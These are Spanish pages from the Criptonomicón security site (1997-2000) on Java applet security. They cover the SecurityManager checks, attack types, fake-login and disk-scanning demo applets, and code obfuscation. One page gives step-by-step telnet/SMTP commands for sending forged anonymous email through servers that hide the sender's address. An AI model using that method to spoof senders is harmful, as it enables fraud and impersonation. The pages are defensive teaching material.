CheckPropertiesAccess()
CheckPropertyAccess
(String)

Comprueba si se puede escribir el fichero de


nombre String.
Las applets no pueden abrir cuadros de
dilogo de ficheros.
Determina si se puede crear un subproceso
para el comando especificado.
Determina si el proceso en curso puede
detener la Mquina Virtual Java (JVM) con el
cdigo de salida especificado.
Determina si se puede acceder a las
propiedades del sistema.
Determina si el proceso en curso puede
acceder a la variable de entorno especificada.

Desgraciadamente, existen mtodos indirectos que permiten explorar los contenidos


del disco duro.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/roboinfo.html (2 of 2) [25/10/2000 02:31:45 p.m.]

Destruccin de informacin

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Destruccin de informacin

Cmo firmar applets

Consejos

Recursos

Todos poseemos datos y ficheros en nuestro ordenador que no


quisiramos perder. Algunos, incluso, tienen media vidad ah
metida y se moriran si se les destruyera la informacin que
guardan en su disco duro. Por estas razones es muy importante
que ninguna applet sea capaz de modificar ni mucho menos
destruir los datos de la mquina cliente en la que se ejecuta.
Los diseadores de Java introdujeron una serie de controles de
seguridad que impiden el acceso al disco. Estas funciones son:
Mtodo
checkDelete(String)

checkRead
(FileDescriptor)
checkRead(String)
checkRead(String,
Object)
checkWrite
(FileDescriptor)
checkWrite(String)

Descripcin
Comprueba si se puede borrar
el fichero de nombre
String.
Comprueba si se puede leer el
fichero indicado por
FileDescriptor.
Comprueba si se puede leer el
fichero de nombre String.
Comprueba si se puede leer el
fichero en el contexto de
seguridad actual.
Comprueba si se puede
escribir el fichero indicado
por FileDescriptor.
Comprueba si se puede
escribir el fichero de nombre
String.

file:///C|/TEMP/criptonomicon/criptonomicon/java/destruccion.html (1 of 2) [25/10/2000 02:31:46 p.m.]

Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao
Lnea Maginot

Destruccin de informacin

checkFileDialog()

Las applets no pueden abrir


cuadros de dilogo de
ficheros.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/destruccion.html (2 of 2) [25/10/2000 02:31:46 p.m.]

Robo de recursos

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Robo de recursos

Cmo firmar applets

Consejos

Recursos

Los ordenadores, adems de almacenar datos, poseen valiosos


recursos como espacio en disco y en memoria, ciclos de CPU,
capacidad de clculo, etc. Una applet descargada silenciosamente
desde una pgina Web podra estar funcionando entre bambalinas,
sin hacer ruido, realizando costosos clculos y enviando los
resultados al servidor desde el que la bajaste sin darte cuenta.

Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio

Enmascaramiento
Es ste el aspecto ms difcil de controlar en Java, ya que las
Engao
applets pueden hacer uso ilimitado de ciclos de CPU, en algunos
Lnea Maginot
casos ralentizando el funcionamiento de tu mquina y hacindote
perder tiempo (por qu hoy compilarn tan lentos los programas? No tendrs el
navegador abierto en otra ventana, verdad? Podra ser el responsable, tras haber
descargado una applet maliciosa).

Resultara muy instructivo que te pasases por una pgina en la que vers cmo una
applet roba recursos de tu sistema para sus propios fines, como por ejemplo realizar
clculos intensivos de factorizacin. Y ya sabis la relacin que existe entre
factorizar y reventar claves, no?
Se trata en definitiva de un problema sin fcil solucin.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/roborecursos.html [25/10/2000 02:31:46 p.m.]

Denegacin de servicio

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Denegacin de servicio

Cmo firmar applets

Consejos

Recursos

En general, estos ataques se basan en utilizar la mayor cantidad


posible de recursos del sistema objetivo, de manera que nadie ms
pueda usarlos, perjudicando as seriamente la actuacin del
sistema, especialmente si debe dar servicio a mucho usuarios.

Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos

Ejemplos tpicos de este ataque son:


Denegacin de
servicio
El consumo de memoria de la mquina vctima, hasta que
Enmascaramiento
se produce un error general en el sistema por falta de
memoria, lo que la deja fuera de servicio.
Engao
Lnea Maginot
El consumo de ciclos de CPU, de forma que el resto de
procesos que corren en la misma mquina apenas dispongan
de tiempo de ejecucin, por lo que su rendimiento decae rpidamente.
La apertura de cientos o miles de ventanas, con el fin de que se pierda el foco
del ratn y del teclado, de manera que la mquina ya no responde a
pulsaciones de teclas o de los botones del ratn, siendo as totalmente
inutilizada. Encontraris ejemplos en la pgina de crashes.

El monopolio de algn perifrico, de manera que nadie ms pueda acceder a


l, obligando as a desconectarlo o a terminar con alguno de los procesos que
corren en la mquina. Podis juagar con gracioso perrito, y veris lo que pasa
(es necesario tener encendidos los altavoces).

Os podis imaginar que en mquinas que deban funcionar ininterrumpidamente,


cualquier interrupcin en su servicio por ataques de este tipo puede acarrear
consecuencias desastrosas. Desgraciadamente, Java no posee ninguna poltica estricta
que permita evitar estos ataques, ya que resulta muy complicado trazar la frontera en
la cantidad de recursos que una applet puede reservar para s.

file:///C|/TEMP/criptonomicon/criptonomicon/java/denegacion.html (1 of 2) [25/10/2000 02:31:46 p.m.]

Denegacin de servicio
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/denegacion.html (2 of 2) [25/10/2000 02:31:46 p.m.]

Enmascaramiento

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Enmascaramiento

Cmo firmar applets

Consejos

Recursos

Las applets de Java proporcionan a cualquier persona que escriba


pginas Web la capacidad de hacerse pasar por otra persona a la
hora de enviar correos (spoofing). Todos los usuarios avezados de
Unix saben que una forma muy sencilla de falsificar correos
electrnicos es hablar directamente con el programa de envo de
correo (sendmail) a travs del puerto 25 (correspondiente al
protocolo SMTP). Podis encontrar una descripcin en Correo
annimo va telnet.

Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao

Lnea Maginot
Una applet de Java es capaz de abrir un socket a dicho puerto 25 y
a partir de ah, seguir todos los pasos del protocolo y enviar as un correo falso.
Tambin posis consultar un applet de Java que acta como sencillo remailer. Esa
applet se puede adaptar sin mucho trabajo para que cuando la cargues desde una
pgina cualquiera en la Red, enve un correo DESDE TU MQUINA sin que t te
enteres en absoluto. Te imaginas lo que eso puede suponerte?

Nota: Por supuesto, que para ello, tu mquina debe monitorizar el puerto 25, no servira si usa un
cliente de POP Mail.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/enmascaramiento.html [25/10/2000 02:31:47 p.m.]

Engao

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Engao

Cmo firmar applets

Consejos

Recursos

Otro ataque muy comn consiste en engaar a una persona para


que nos facilite informacin confidencial. Un ejemplo tpico es el
que se conoce como de ingeniera social: te haces pasar por el
administrador de una red o servicio y pides a los usuarios incautos
que te enven su login y password para no s qu labor de
actualizacin de la versin del programa menganito que piensas
realizar en breve. Bien, os aseguro que un porcentaje elevado
enva ciegamente sus datos.

Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao

Lnea Maginot
Una forma ms sofisticada de engao consiste en falsificar
ventanas del sistema, para obligar al usuario a que ejecute una accin que de otro
modo no realizara, como rearrancar el ordenador (perdiendo los datos) o suministrar
su login y password.

Existen formas de hacerlo en Java, como podris comprobar en la pgina sobre


ventanas falsas, por mucho que los diseadores de Java lucharon contra ello,
incluyendo el siguiente control de seguridad en la clase SecurityManager:
Mtodo
Descripcin
boolean checkTopLevelWindow Determina si se puede mostrar una ventana
de aplicacin sin aadir restricciones,
(Object)
normalmente un aviso de que la ventana
pertenece a una applet.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/enganio.html [25/10/2000 02:31:47 p.m.]

Agujeros tipo Lnea Maginot

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Agujeros tipo Lnea Maginot

Cmo firmar applets

Consejos

Recursos

Primero, hagamos un poco de historia. En tiempos de la Segunda


Guerra Mundial, los franceses construyeron una barrera de
defensa a todo lo largo de su frontera con Alemania, que con la
tecnologa blica de su poca era imposible de franquear. La
bautizaron con el nombre de Lnea Maginot. Lo que ocurri fue
que los alemanes invadieron Holanda y desde ah pasaron a
Blgica, aliado de Francia y que no le iba a traicionar. Sin
embargo, por la fuerza, los alemanes atacaron Francia a travs de
la frontera de Francia con Blgica, por lo que la Lnea Maginot no
sirvi de nada.

Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao
Lnea Maginot

La moraleja de la historia es que a veces esperamos al enemigo en un frente y nos


parapetamos y defendemos en ese frente, mientras el enemigo nos ataca desde otro
frente que considerbamos de confianza.
Para una discusin muy tcnica sobre una forma de ataque tipo Maginot, podis leer
el artculo de Jean-Paul Billon, aunque hoy tal vez haya quedado un poco desfasado.
Otra forma de ataques tipo Maginot que siguen candentes provienen de la
decompilacin de los ficheros de clase a cdigo fuente.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/maginot.html [25/10/2000 02:31:47 p.m.]

Ofuscacin de cdigo

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Ofuscacin de cdigo

Consejos

El problema
Recursos

Ataques
Robo de informacin

Resulta extremedamente sencillo obtener el cdigo fuente (fichero


Destruccin de
informacin
.java) a partir del cdigo compilado (fichero .class), siempre y
Robo de recursos
cuando no se haya utilizado un ofuscador de cdigo (ms sobre
ofuscadores muy pronto), mediante herramientas de
Denegacin de servicio
decompilacin como la proscrita mocha. En otras palabras, si no
Enmascaramiento
se toman las precauciones debidas, cualquier aplicacin en Java
Engao
puede ser vctima de ingeniera inversa y as obtener su cdigo
Lnea Maginot
fuente. Os dais cuenta de las implicaciones que conlleva?
Cualquiera puede modificar nuestros programas, se pueden eliminar contadores de
caducidad, controles de licencia, etc. Un caos para las casas comerciales. Nadie
podra vender productos en Java, ya que cualquiera te lo puede fusilar.

La solucin
La manera ms extendida entre los desarrolladores de aplicaciones Java para poner
coto a esta ingeniera inversa y evitar la violacin de sus derechos de autor consiste
en ofuscar el cdigo, esto es, oscurecerlo de forma tal que resulte prcticamente
imposible decompilarlo e incluso interpretarlo correctamente aun si se obtiene el
cdigo fuente por el procedimiento que fuera. Esta ofuscacin se consigue en la
prctica por medio de la inclusin de bucles irrelevantes, clculos innecesarios,
comprobaciones absurdas, nombres de funciones y de variables que no tienen nada
que ver con su cometido, funciones largusimas que no sirven para nada,
interacciones inverosmiles entre variables y funciones, etc.
No conviene olvidar que los ofuscadores no tienen nada que ver con la seguridad en
los programas, simplemente aaden grandes complicaciones al proceso de
decompilacin y posterior interpretacin del cdigo fuente de los programas. Nunca
se debe confiar en ellos para implementar mecanismos de seguridad, fieles a la

file:///C|/TEMP/criptonomicon/criptonomicon/java/ofuscacion.html (1 of 2) [25/10/2000 02:31:48 p.m.]

Ofuscacin de cdigo

mxima "No existe seguridad a travs de la oscuridad".

Una serie de consejos para ofuscar el cdigo


Que todos los nombres de funciones y variables carezcan de sentido
Incluir ocasionalmente clculos y bucles sin sentido
Esconder nmeros pequeos en cadenas de texto
Crear mtodos grandes, en vez de utilizar subrutinas
Distribuir los mtodos entre las subclases

Por supuesto, no se debe comenzar a escribir el programa de esta manera. Primero, se


debe escribir de forma convencional y luego se le irn aplicando las reglas anteriores
hasta que haya quedado satisfactoriamente oscurecido.
Dnde conseguir ofuscadores
Dado que ofuscar ptimamente un programa resulta muy complicado, ya que hacerlo
a mano puede introducir gran cantidad de errores y reducir drsticamente su
eficiencia, lo ms cabal suele ser adquirir uno de una casa comercial. En el mercado
existen algunos como:
SourceGuard

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/ofuscacion.html (2 of 2) [25/10/2000 02:31:48 p.m.]

Agujeros de seguridad de los navegadores (Java)

Ejemplo de fallo de seguridad en Java


Suscripcin gratis

Intimidad?

Artculos

Seguridad

Aunque Java est diseado para evitar ciertas acciones maliciosas que puedan
engaar a los usuarios, existen pequeas trampas para saltarse las barreras.
En concreto, el gestor de seguridad de Java controla la creacin de nuevas ventanas
desde un applet, con el fin de que no puedan engaar al usuario, que podra pensar
que pertenecen a una aplicacin de fiar en vez de al applet desde el que han sido
abiertas. Estas ventanas podran presentar mensajes a los usuarios en los que se les
pidiera introducir el login y password porque ha ocurrido un error general del
sistema, por ejemplo.
A estas alturas ya habrs notado una pantalla azul, verdad?

Linux

Navegacin segura

Control de acceso

CGI

Java

Tericamente, las ventanas vienen acompaadas de un cartelito en la parte inferior


que te avisa de que ests ante una ventana de un applet. Adems aparece la llave rota
para recalcar el hecho de la inseguridad. Puedes comprobarlo pinchando en "Mostrar
Frame".
Sin pinchas en el segundo botn, vers una pantalla que te pide login y password. En
este caso no se aprecia el mensajito porque se sale de los lmites de la pantalla. Si
tuviera tiempo (quin lo tiene?) para presentarla de forma que imite a la entrada en
sistemas Windows95 o NT, el usuario medio caera en la trampa, metera su login y
password... y adis a su seguridad. Este applet es slo una demostracin de concepto.

JavaScript

Cookies

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Crashes

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/ventana.html (1 of 2) [25/10/2000 02:31:48 p.m.]

Agujeros de seguridad de los navegadores (Java)


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/ventana.html (2 of 2) [25/10/2000 02:31:48 p.m.]

Correo annimo va telnet

Correo annimo va telnet


Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Una manera muy sencilla de enviar correos annimos sin necesidad de utilizar
repetidores es conectarse a un servidor de SMTP a travs de Internet, simplemente
haciendo un TELNET al puerto 25.
Los pasos a seguir son los siguientes:
1) Localizar un servidor de SMTP lo suficientemente antiguo como para no incluir
en las cabeceras del correo que enva la direccin de la mquina que se le conect.
En el ejemplo, llamaremos a esta mquina aaa.bbb.ccc
Sin duda, ste es el paso ms difcil de todos. Sin un servidor as no es posible enviar
correos annimamente. Puedes comprobar los siguientes servidores, a ver si alguno
sirve todava.
2) Busca para ti un nombre cualquiera de mquina (direccin IP), pero que exista.
Puede servir uno cualquiera de FTP, HTTP, o lo que sea. Ser tu direccin IP falsa, a
la que llamaremos xx.yy.zz.

Control de acceso

CGI

Java

JavaScript

3) Establece una conexin TELNET al puerto 25 con la mquina encontrada en el


paso 1.
En Unix, escribe telnet aaa.bbb.ccc 25
En programas de Windows, escribe en la casilla de Host el nombre del paso 1 y en la
de puerto, cambia TELNET por 25.
4) Si el sitio acepta la peticin de conexin, te aparecer un mensaje como
220 aaa.bbb.ccc ESMTP Sendmail 8.7.6/8.7.3; Tue, 3 Feb
1998 16:45:30+0100

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

5) Despus de la bienvenida de la mquina, saldale t escribiendo:


HELO xx.yy.zz
a lo que el host responder con alguna clase de presentacin, como por ejemplo:
250 aaa.bbb.ccc Hello xx.yy.zz [###.###.###.###], pleased
to meet you
6) Escribe los siguientes comandos, sin olvidar el retorno de carro al final de cada
lnea:
MAIL FROM: <unadireccion@falsa.es>
RCPT TO: <tudireccion@verdadera.es>
DATA
Subject: El tema del correo
A continuacin el texto del mensaje. No olvides dar un
retorno de carro adicional despus del subject. Todos los
mensajes deben terminar con un punto en una lnea sola.
.
QUIT

file:///C|/TEMP/criptonomicon/criptonomicon/telnet.html (1 of 2) [25/10/2000 02:31:48 p.m.]

Correo annimo va telnet


Consejos prcticos

Referencias

Libro de Visitas

Con esto ya habras enviado un correo y cerrado la sesin con el host. Espera a que te
llega el mail y examina las cabeceras para ver si ha quedado rastro de tu direccin de
mquina o algo que te delate. Si fuera as, vuelve al paso 1 y busca un servidor de
SMTP apropiado.
A modo de ejemplo, puedes utilizar el applet de demostracin en remailer sencillo.
Utilizando el applet, recibirs algo como
Received: from localhost (tu verdadera mquina) by
aaa.bbb.ccc (8.7.6/8.7.3) with SMTP id RAA08608 for ;
Tue, 3 Feb 1998 17:02:43 +0100
que desvela tu direccin, por lo ese servidor no puede ser usado para enviar correos
annimos. Sin embargo hay otros que s que lo son. Slo tienes que buscarlos.

file:///C|/TEMP/criptonomicon/criptonomicon/telnet.html (2 of 2) [25/10/2000 02:31:48 p.m.]

Clculo distribuido por Internet

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Clculo distribuido por Internet


Control de acceso

CGI

Java

Una de las caractersticas ms difciles de controlar en una applet es su capacidad


para utilizar los recursos de nuestro sistema. Esta applet realiza una serie de clculos
y una vez ha terminado establece una conexin con el servidor desde el que ha sido
cargada, al que le enva el resultado de los clculos.

JavaScript

Puedes ver el resultado leyendo el fichero de registro, donde se van almacenando los
datos que envan los contribuyentes (in)voluntarios a la computacin paralela.

Cookies

Nota: Si accedes varias veces al fichero de registro, no olvides pulsar el botn de Recargar la pgina, para que se actualice la ltima
modificacin.
Esta applet la he tomado de Mark LaDue.

Crashes

Agujeros
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Spam

Remailers

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/java/factor/factor.html (1 of 2) [25/10/2000 02:31:49 p.m.]

Clculo distribuido por Internet


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/java/factor/factor.html (2 of 2) [25/10/2000 02:31:49 p.m.]

Escaneador del disco duro

Me temo que tienes un grave agujero de


seguridad
Perdname un momentito mientras escaneo tu disco duro en busca de informacin...
Nota: Si al recargar la pgina ya no funciona ms el applet (java.lang.NullPointerException), para que vuelva a funcionar
no queda ms remedio que cerrar el navegador y volver a arrancarlo. Lo siento.
Esta demostracin la he tomado de Jim Buzbee.

He aqu un ejemplo de cmo sin necesidad de tener acceso directo al sistema de ficheros, s que puedo en
la prctica hacerme una idea de cmo est organizado tu disco duro. Estos datos que voy recabando sobre
tu sistema me los podra enviar por correo electrnico, y as saber qu tipo de software tienes instalado
(p.e. si existe el directorio c:\msoffice es porque tendrs Office instalado; si existe el directorio c:\msdev
ser porque has instalado el Developer Studio para C++, J++, etc.). Os imaginis lo valiosos que pueden
ser estos datos en las manos de Bill Gates, para planificar sus campaas de marketing?
Volver a la seccin de agujeros

file:///C|/TEMP/criptonomicon/criptonomicon/java/filehole/filehole.html [25/10/2000 02:31:49 p.m.]

Restriccin de acceso al sistema de ficheros en Java


Restricciones
Sistema de ficheros
Conexiones de red
Acceso al sistema
Manipulacin de threads
Mtodos nativos
Mensajes de alerta
Qu es Java

Barreras de seguridad

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Restriccin de acceso al sistema de


ficheros
No cuesta trabajo comprender por qu se le niega el acceso a nuestro sistema de
ficheros a cualquier applet desconocida descargada desde la Red (posiblemente sin ni
siquiera nuestro conocimiento, cunto menos nuestro consentimiento).
Si no existiera esta restriccin, las applets plantearan los siguientes problemas:
Acceso a informacin de seguridad: como por ejemplo el fichero
/etc/passwd de Unix.
Acceso a informacin privada: correo, documentos, etc., almacenados en
nuestro disco duro.
Si las applets pudieran escribir ficheros, podran inocular virus (especialmente
caballos de Troya, como aplicaciones aparentemente de utilidad, pero que
abran la puerta a problemas).
Al escribir un fichero se puede llegar a llenar el disco, causando denegacin de
servicio.
Se podran modificar los ficheros (p.e. cifrarlos o destruirlos).
Se pueden crear ficheros de engao.
Conocer la estructura de directorios puede revelar informacin e identificar
debilidades acerca del sistema (especialmente en Unix):
Identificar nombres de programas CGI ocultos.
Identificar debilidades de seguridad.

file:///C|/TEMP/criptonomicon/criptonomicon/java/ficheros.html (1 of 2) [25/10/2000 02:31:50 p.m.]

Restriccin de acceso al sistema de ficheros en Java

Revelar archivos .rhost.


Etc.

Desgraciadamente, existen mtodos subrepticios para explorar la estructura de


directorios.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/ficheros.html (2 of 2) [25/10/2000 02:31:50 p.m.]

Restriccin de conexiones de red en Java


Restricciones
Sistema de ficheros
Conexiones de red
Acceso al sistema
Manipulacin de threads
Mtodos nativos
Mensajes de alerta
Qu es Java

Barreras de seguridad

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Restriccin de conexiones de red


Si las applets fueran capaces de establecer conexiones indiscriminadamente, se
podran producir los siguientes tipos de ataque:
Ataques desde dentro de un firewall: el applet hostil podra descargarse desde
una inocente pgina Web, pasando los controles del firewall, y una vez dentro,
hacerse pasar por la mquina que la ha descargado para establecer conexiones
o recibirlas.
Suplantacin de usuario, explotando la confianza de otras mquinas: una vez
que el usuario incauto ha descargado inadvertidamente la applet y se encuentra
en ejecucin en su sistema, la applet podra comunicarse con otras mquinas
usando la direccin IP de la mquina del pobre usuario y enviar por ejemplo
correos ofensivos.
Escucha de puertos que suplanten a un servicio (p.e. servidor Web, escuchando
en el puerto 80 y respondiendo a todas las peticiones de pginas con sus
propias pginas. Algo terrible para el sitio Web suplantado).
Para evitarlo, el gestor de seguridad se cuida de comprobar todos los intentos de
conexin. En concreto, la clase SecurityManager define los siguientes mtodos:
Mtodo
checkAccept(String, int)

Descripcin
Se llama antes de aceptar una
conexin con un socket de la
mquina especificada en el puerto
especificado.

file:///C|/TEMP/criptonomicon/criptonomicon/java/conexiones.html (1 of 2) [25/10/2000 02:31:50 p.m.]

Restriccin de conexiones de red en Java

Se llama antes de abrir una


conexin con un socket a la
mquina especificada en el puerto
especificado.
checkConnect(String, int, Object) Se llama antes de abrir una
conexin con un socket a la
mquina especificada en el puerto
especificado para el contexto de
seguridad actual.
Se llama para determinar si el
checkListen(int)
proceso en curso tiene permiso
para quedarse a la escucha de
conexiones en el puerto
especificado.
Determina si el proceso en curso
checkSetFactory()
tiene permiso para establecer la
factora de manejadores de socket
o streams de URL.
checkConnect(String, int)

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/conexiones.html (2 of 2) [25/10/2000 02:31:50 p.m.]

Restriccin de acceso al sistema en Java


Restricciones
Sistema de ficheros
Conexiones de red
Acceso al sistema
Manipulacin de threads
Mtodos nativos
Mensajes de alerta
Qu es Java

Barreras de seguridad

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Restriccin de acceso al sistema


A las applets se les niega la capacidad de ejecutar programas en la mquina local y
de acceder a propiedades del sistema, ya que estas capacidades podran usarse para
robo o destruccin de informacin o denegacin de servicio:
Terminar la sesin del navegador (simplemente llamando a
System.exit()).
Ejecutar comandos que manipulen los ficheros u otros servicios.
Conocer informacin privada del sistema o que puede revelar debilidades.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/sistema.html [25/10/2000 02:31:50 p.m.]

Restriccin de manipulacin de threads en Java


Restricciones
Sistema de ficheros
Conexiones de red
Acceso al sistema
Manipulacin de
threads
Mtodos nativos
Qu es Java

Mensajes de alerta

Barreras de seguridad

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Restriccin de de manipulacin de
threads

Las applets podran destruir trabajo cerrando o deshabilitando otros


componentes de las aplicaciones en que corren.
Ataques de denegacin de servicio, aumentando su propia prioridad.

Puedes ver un ejemplo de applet que se descarga sin que el usuario se d cuenta para
a partir de ese momento destruir todos los threads de otras applets.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/threads.html [25/10/2000 02:31:51 p.m.]

Restriccin de acceso a mtodos nativos en Java


Restricciones
Sistema de ficheros
Conexiones de red
Acceso al sistema
Manipulacin de threads
Mtodos nativos
Mensajes de alerta
Qu es Java

Barreras de seguridad

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Restriccin de acceso a mtodos nativos


Se conoce como mtodos nativos a cdigo escrito en otro lenguaje distinto de Java,
como en C o en ensamblador. Las bibliotecas de mtodos nativos, por un lado,
resultan de crucial importancia para extender la funcionalidad base de la Mquina
Virtual Java; por otro, constituyen la ltima puerta trasera de entrada, ya que pueden
sortear los mecanismos de seguridad de Java, aunque no tienen por qu. Por este
motivo, cargar una biblioteca de mtodos nativos podra comprometer la seguridad
de todo el sistema, ya que al no estar escritos en Java, no necesitan respetar las reglas
de proteccin de Java y ni siquiera se les exige (aunque lo deberan hacer) el usar las
clases existentes. As, pueden acceder a los recursos locales del sistema, bien
proveyendo acceso a nuevos recursos no contemplados en Java y sin protegerlos
adecuadamente, bien burlando las comprobaciones de seguridad de Java.
En primer lugar, se debe estudiar si realmente resulta necesario implementar una
biblioteca de mtodos nativos (seguro que Java no hace eso que necesitas?). En caso
afirmativo, tanto porque Java no est capacitado para realizar la tarea, como por baja
eficiencia en Java (como en rutinas matemticas), si su uso est justificado, es
importante integrar dicha biblioteca en el modelo de seguridad de Java.
Para ello, en segundo lugar, se deben identificar los recursos sensibles que podran
resultar expuestos por la biblioteca. Despus, se puede disear un interfaz de
seguridad para la biblioteca e implementar una poltica de seguridad conservadora.
Desgraciadamente, estas tareas slo estn al alcance de programadores muy
avanzados.

file:///C|/TEMP/criptonomicon/criptonomicon/java/nativos.html (1 of 2) [25/10/2000 02:31:51 p.m.]

Restriccin de acceso a mtodos nativos en Java

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
